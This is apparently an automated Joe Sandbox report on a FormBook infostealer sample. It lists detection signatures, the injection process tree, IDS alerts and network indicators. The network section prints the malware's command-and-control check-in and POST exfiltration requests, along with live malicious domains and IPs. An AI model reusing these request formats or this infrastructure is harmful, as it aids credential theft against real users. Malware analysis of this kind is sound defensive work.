Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5by4QM3v89.exe

Overview

General Information

Sample name:5by4QM3v89.exe
renamed because original name is a hash value
Original sample name:959fba0b97e92f877bcd92b4b68d7280719e6f009bffc6ae642a18c6c816695f.exe
Analysis ID:1588594
MD5:6c05e87405d63cb15d69816adabe9910
SHA1:c99d0840f3a45216f78c126aa9f2338903759d15
SHA256:959fba0b97e92f877bcd92b4b68d7280719e6f009bffc6ae642a18c6c816695f
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 5by4QM3v89.exe (PID: 8020 cmdline: "C:\Users\user\Desktop\5by4QM3v89.exe" MD5: 6C05E87405D63CB15D69816ADABE9910)
    • svchost.exe (PID: 8104 cmdline: "C:\Users\user\Desktop\5by4QM3v89.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • rVnDkmUdXXPrwb.exe (PID: 4880 cmdline: "C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • control.exe (PID: 7748 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • rVnDkmUdXXPrwb.exe (PID: 6248 cmdline: "C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.26a0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.26a0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\5by4QM3v89.exe", CommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", ParentImage: C:\Users\user\Desktop\5by4QM3v89.exe, ParentProcessId: 8020, ParentProcessName: 5by4QM3v89.exe, ProcessCommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", ProcessId: 8104, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\5by4QM3v89.exe", CommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", ParentImage: C:\Users\user\Desktop\5by4QM3v89.exe, ParentProcessId: 8020, ParentProcessName: 5by4QM3v89.exe, ProcessCommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", ProcessId: 8104, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T02:53:41.780016+010020507451Malware Command and Control Activity Detected192.168.2.1049971162.0.215.9180TCP
                2025-01-11T02:54:05.302271+010020507451Malware Command and Control Activity Detected192.168.2.1049975194.58.112.17480TCP
                2025-01-11T02:54:18.704444+010020507451Malware Command and Control Activity Detected192.168.2.1049979199.192.23.12380TCP
                2025-01-11T02:54:32.005451+010020507451Malware Command and Control Activity Detected192.168.2.104998366.29.146.7880TCP
                2025-01-11T02:54:45.193298+010020507451Malware Command and Control Activity Detected192.168.2.104998784.32.84.3280TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 5by4QM3v89.exeVirustotal: Detection: 63%Perma Link
                Source: 5by4QM3v89.exeReversingLabs: Detection: 65%
                Source: Yara matchFile source: 2.2.svchost.exe.26a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.26a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 5by4QM3v89.exeJoe Sandbox ML: detected
                Source: 5by4QM3v89.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rVnDkmUdXXPrwb.exe, 00000004.00000000.1757884591.0000000000FEE000.00000002.00000001.01000000.00000005.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906924468.0000000000FEE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 5by4QM3v89.exe, 00000000.00000003.1392160166.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, 5by4QM3v89.exe, 00000000.00000003.1392416522.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729316683.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731560866.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004990000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004B2E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1838640799.000000000463C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1840808432.00000000047E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: control.pdb source: svchost.exe, 00000002.00000003.1806607303.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806469513.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000003.1905177292.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 5by4QM3v89.exe, 00000000.00000003.1392160166.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, 5by4QM3v89.exe, 00000000.00000003.1392416522.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1838546864.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729316683.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731560866.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004990000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004B2E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1838640799.000000000463C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1840808432.00000000047E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: control.pdbUGP source: svchost.exe, 00000002.00000003.1806607303.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806469513.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000003.1905177292.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1907006219.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1907006219.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003F445A
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FC6D1 FindFirstFileW,FindClose,0_2_003FC6D1
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003FC75C
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003FEF95
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003FF0F2
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003FF3F3
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003F37EF
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003F3B12
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003FBCBC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi2_2_026B8C4A

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49975 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49979 -> 199.192.23.123:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49983 -> 66.29.146.78:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49971 -> 162.0.215.91:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49987 -> 84.32.84.32:80
                Source: DNS query: www.athanasopoulos.xyz
                Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_004022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004022EE
                Source: global trafficHTTP traffic detected: GET /3nos/?LR=KBvPk&0lTTc=1/fYX5IH1p60T533ow+0qh+l20UPyOCArDGXXdPa4lTk/5WGTli4a0p83eZdhsWvqj9Lin79fUjq6P0sl7rbq747D9kmfHJKfQ5r+0m+OVBD6yU62Q== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.hirmic4820voe.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.elinor.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /kbdb/?0lTTc=1tSIZCMizzCWiaBRWQGky41xM3BT5gdalGybiYpqvDYVvQaidb2ENkfsty8txqySZEM8rWjWTLVwzzYipQr6s5YuXW5OAcplfRP5h3UAJn3wyHALXA==&LR=KBvPk HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.happytrail.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /01kd/?0lTTc=Bwd2OemdLjmJMGV3rhrX5wcyn7e37k0HlZ2ImklC1ZcabiHtTZNjzLKNphAXpIzoErDL03bbR9rC7Ulfl1FOK5c2VAGA3RdE9RsClYyfxzqaNIzCHQ==&LR=KBvPk HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.spinpinang01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.athanasopoulos.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.hirmic4820voe.shop
                Source: global trafficDNS traffic detected: DNS query: www.elinor.club
                Source: global trafficDNS traffic detected: DNS query: www.happytrail.life
                Source: global trafficDNS traffic detected: DNS query: www.spinpinang01.click
                Source: global trafficDNS traffic detected: DNS query: www.athanasopoulos.xyz
                Source: unknownHTTP traffic detected: POST /izuw/ HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.elinor.clubOrigin: http://www.elinor.clubReferer: http://www.elinor.club/izuw/Content-Type: application/x-www-form-urlencodedContent-Length: 194Cache-Control: max-age=0Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36Data Raw: 30 6c 54 54 63 3d 6d 73 5a 34 72 4d 4c 79 6a 59 74 4f 53 34 48 50 49 39 4c 72 43 4f 57 45 6f 4c 4c 56 61 4e 38 50 38 4d 4e 62 44 6e 62 56 53 43 45 51 78 70 71 6c 67 4c 63 62 44 64 36 4e 70 73 52 41 38 34 46 6b 45 37 2f 4e 55 2b 65 65 47 4d 34 59 4b 72 54 50 6a 70 77 72 61 2f 31 6c 54 6c 66 36 54 39 56 6a 4a 72 6c 72 79 6b 4c 69 37 76 4b 36 68 36 2b 32 71 47 65 68 69 69 55 39 65 53 76 39 6e 50 4b 78 72 77 47 42 4f 6b 32 6e 35 47 63 45 69 45 33 48 4e 46 71 79 39 57 6b 55 61 70 4b 47 76 66 61 61 7a 66 63 43 5a 7a 31 59 78 34 6d 67 71 51 4d 4a 56 6f 6d 4c 37 6e 47 5a 64 55 75 65 Data Ascii: 0lTTc=msZ4rMLyjYtOS4HPI9LrCOWEoLLVaN8P8MNbDnbVSCEQxpqlgLcbDd6NpsRA84FkE7/NU+eeGM4YKrTPjpwra/1lTlf6T9VjJrlrykLi7vK6h6+2qGehiiU9eSv9nPKxrwGBOk2n5GcEiE3HNFqy9WkUapKGvfaazfcCZz1Yx4mgqQMJVomL7nGZdUue
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sat, 11 Jan 2025 01:53:41 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:54:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
